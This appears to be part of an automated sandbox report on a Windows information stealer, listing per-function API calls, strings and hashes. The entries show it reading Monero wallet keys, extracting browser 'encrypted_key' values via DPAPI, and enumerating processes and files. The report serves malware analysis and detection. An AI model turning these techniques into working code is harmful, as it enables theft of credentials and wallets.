                      • Opcode ID: 5e67f2b7486da5e2cc6c565161b2345e86f20d126a4d174bc3e2e9d2acf47a4d
                      • Instruction ID: 6572173ee20c28a1d61e7c84ae26954da52f2fd61711d16b2bea9c61ba9ba16f
                      • Opcode Fuzzy Hash: 5e67f2b7486da5e2cc6c565161b2345e86f20d126a4d174bc3e2e9d2acf47a4d
                      • Instruction Fuzzy Hash: F1E1EE72950108FAEB05FBA4DC9AEEE737CEF54304F508169F51672091EF386A49CB62
                      Function 0073D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                        • Part of subcall function 00748B60: GetSystemTime.KERNEL32(00750E1A,013E9998,007505AE,?,?,007313F9,?,0000001A,00750E1A,00000000,?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 00748B86
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0073D481
                      • lstrlen.KERNEL32(00000000), ref: 0073D698
                      • lstrlen.KERNEL32(00000000), ref: 0073D6AC
                      • DeleteFileA.KERNEL32(00000000), ref: 0073D72B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: d8dbe15b58881e0c810d995afe8763268c25f94621ae78717de2decbb8b92e6f
                      • Instruction ID: 8bbed56c3ae772983837476fac4307c7b7bfa7a9ac8893b577cbd93765c615a7
                      • Opcode Fuzzy Hash: d8dbe15b58881e0c810d995afe8763268c25f94621ae78717de2decbb8b92e6f
                      • Instruction Fuzzy Hash: 73910172950108EAEB05FBA0DC9AEEE737CEF54304F514168F51666092EF386A49CB62
                      Function 0073D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                        • Part of subcall function 00748B60: GetSystemTime.KERNEL32(00750E1A,013E9998,007505AE,?,?,007313F9,?,0000001A,00750E1A,00000000,?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 00748B86
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0073D801
                      • lstrlen.KERNEL32(00000000), ref: 0073D99F
                      • lstrlen.KERNEL32(00000000), ref: 0073D9B3
                      • DeleteFileA.KERNEL32(00000000), ref: 0073DA32
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: 0e58c7887d4d11c09ad98ef06a00d801756582464a8a9f70054d0ccaec503044
                      • Instruction ID: 1b4f3dc9189dec01af0657865f6445aa9cd949f0534e60259f62b6c848db7e41
                      • Opcode Fuzzy Hash: 0e58c7887d4d11c09ad98ef06a00d801756582464a8a9f70054d0ccaec503044
                      • Instruction Fuzzy Hash: 71812472954104EBEB05FBA0DC5ADEE737DEF54304F414528F407A6092EF386A09CB62
                      Function 007470D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                      Download Yara Rule
                      Strings
                      • st, xrefs: 007472AE, 00747179, 0074717C
                      • st, xrefs: 00747111
                      • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0074718C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy
                      • String ID: st$st$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                      • API String ID: 3722407311-2923598100
                      • Opcode ID: c205cf95b49d10dcae63f492ed732aad298b4a0237e5fa80457cc76b9f6e1d00
                      • Instruction ID: eb6f80080464c2ef0ba32312b52f38013e099b57e156abc51fda0b0d68269dcb
                      • Opcode Fuzzy Hash: c205cf95b49d10dcae63f492ed732aad298b4a0237e5fa80457cc76b9f6e1d00
                      • Instruction Fuzzy Hash: A25141B1D44218EFDB28EBA0DD85BEEB374EF54304F1041A8E61576182EB786E88CF55
                      Function 00743560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen
                      • String ID:
                      • API String ID: 367037083-0
                      • Opcode ID: e96bcdabc874b972e76eaf7bf003d8672e0f6237b6183c57a0a8412b21e3eb18
                      • Instruction ID: b6d290a500f6d7bf75e6ebe8e6f9884d9887590922b057361d7d7d1085957759
                      • Opcode Fuzzy Hash: e96bcdabc874b972e76eaf7bf003d8672e0f6237b6183c57a0a8412b21e3eb18
                      • Instruction Fuzzy Hash: FF4130B1D54109EFDB04EFA4D849AEEB778AF54304F108018F51A76291DB79AA09CFA2
                      Function 00739CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 007399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007399EC
                        • Part of subcall function 007399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00739A11
                        • Part of subcall function 007399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00739A31
                        • Part of subcall function 007399C0: ReadFile.KERNEL32(000000FF,?,00000000,0073148F,00000000), ref: 00739A5A
                        • Part of subcall function 007399C0: LocalFree.KERNEL32(0073148F), ref: 00739A90
                        • Part of subcall function 007399C0: CloseHandle.KERNEL32(000000FF), ref: 00739A9A
                        • Part of subcall function 00748E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00748E52
                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00739D39
                        • Part of subcall function 00739AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739AEF
                        • Part of subcall function 00739AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00734EEE,00000000,?), ref: 00739B01
                        • Part of subcall function 00739AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739B2A
                        • Part of subcall function 00739AC0: LocalFree.KERNEL32(?,?,?,?,00734EEE,00000000,?), ref: 00739B3F
                        • Part of subcall function 00739B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00739B84
                        • Part of subcall function 00739B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00739BA3
                        • Part of subcall function 00739B60: LocalFree.KERNEL32(?), ref: 00739BD3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                      • String ID: $"encrypted_key":"$DPAPI
                      • API String ID: 2100535398-738592651
                      • Opcode ID: 5ea0464b655f5ca0832f84294452d83243a50364d4d5ae642cd4453acc5424c2
                      • Instruction ID: b4b0572ac06c818cf5aba37b75c22fbe16f3e59a88d270e30d9176bbde29a5df
                      • Opcode Fuzzy Hash: 5ea0464b655f5ca0832f84294452d83243a50364d4d5ae642cd4453acc5424c2
                      • Instruction Fuzzy Hash: 833156B5E10109EBDF04DFE4DC86AEF77B8BF44304F544518EA05A7242E7789A04CBA1
                      Function 00748680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,007505B7), ref: 007486CA
                      • Process32First.KERNEL32(?,00000128), ref: 007486DE
                      • Process32Next.KERNEL32(?,00000128), ref: 007486F3
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      • CloseHandle.KERNEL32(?), ref: 00748761
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                      • String ID:
                      • API String ID: 1066202413-0
                      • Opcode ID: 77de83550f1443c2de0551f4c97f40aa3abcb1b2113719c490ac6928d9fedeb8
                      • Instruction ID: 7a392a55d61a1f51e4fa55d999ce01d94882c56aed66a5c23636ae55f810e9b6
                      • Opcode Fuzzy Hash: 77de83550f1443c2de0551f4c97f40aa3abcb1b2113719c490ac6928d9fedeb8
                      • Instruction Fuzzy Hash: F9316D71941218EBDB25DF90CC55FEEB778EB44700F1041A9E50AA21A0DB386E45CFA2
                      Function 00747980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00750E00,00000000,?), ref: 007479B0
                      • RtlAllocateHeap.NTDLL(00000000), ref: 007479B7
                      • GetLocalTime.KERNEL32(?,?,?,?,?,00750E00,00000000,?), ref: 007479C4
                      • wsprintfA.USER32 ref: 007479F3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                      • String ID:
                      • API String ID: 377395780-0
                      • Opcode ID: c813a343f89b8765742dd021e69429561b312b3a4e951f15df7986a4a10f9198
                      • Instruction ID: a76ec64370861e8c75fd41b769a078a56456670ccc8e41071564d93a72b8b2c3
                      • Opcode Fuzzy Hash: c813a343f89b8765742dd021e69429561b312b3a4e951f15df7986a4a10f9198
                      • Instruction Fuzzy Hash: 981127B2918118ABCB14DFC9DD45BBEB7F8FB8CB11F14425AF605A2280E3395940DBB1
                      Function 0074C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • __getptd.LIBCMT ref: 0074C74E
                        • Part of subcall function 0074BF9F: __amsg_exit.LIBCMT ref: 0074BFAF
                      • __getptd.LIBCMT ref: 0074C765
                      • __amsg_exit.LIBCMT ref: 0074C773
                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0074C797
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                      • String ID:
                      • API String ID: 300741435-0
                      • Opcode ID: 407a073867b3a4352e56e401377e729a3868f0b885797632333c8c4dd7655cfd
                      • Instruction ID: 95ee45351b3f708b2ed6e501a5ef87643de55e561808f9a5eb94821ba3b3d0a5
                      • Opcode Fuzzy Hash: 407a073867b3a4352e56e401377e729a3868f0b885797632333c8c4dd7655cfd
                      • Instruction Fuzzy Hash: 36F0B432942700EBD7A3BBB8580B79D33A06F00721F248149F404A61D2DB6C9D449E5A
                      Function 00744F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00748E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00744F7A
                      • lstrcat.KERNEL32(?,00751070), ref: 00744F97
                      • lstrcat.KERNEL32(?,013E8AE0), ref: 00744FAB
                      • lstrcat.KERNEL32(?,00751074), ref: 00744FBD
                        • Part of subcall function 00744910: wsprintfA.USER32 ref: 0074492C
                        • Part of subcall function 00744910: FindFirstFileA.KERNEL32(?,?), ref: 00744943
                        • Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,00750FDC), ref: 00744971
                        • Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,00750FE0), ref: 00744987
                        • Part of subcall function 00744910: FindNextFileA.KERNEL32(000000FF,?), ref: 00744B7D
                        • Part of subcall function 00744910: FindClose.KERNEL32(000000FF), ref: 00744B92
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                      • String ID:
                      • API String ID: 2667927680-0
                      • Opcode ID: 5dc3a9d671331870fe4bdb8b04415ceef0f90f5fa55a67800bd54652b54b1dea
                      • Instruction ID: ea38c41ea9eaebef57b1cd3941709da6343c9cd021d14b8fcbd344a92cd26292
                      • Opcode Fuzzy Hash: 5dc3a9d671331870fe4bdb8b04415ceef0f90f5fa55a67800bd54652b54b1dea
                      • Instruction Fuzzy Hash: 582198B7914208ABD754FBB0DC4AFED337CABD4301F404554B65D92181EEB8AAC89B93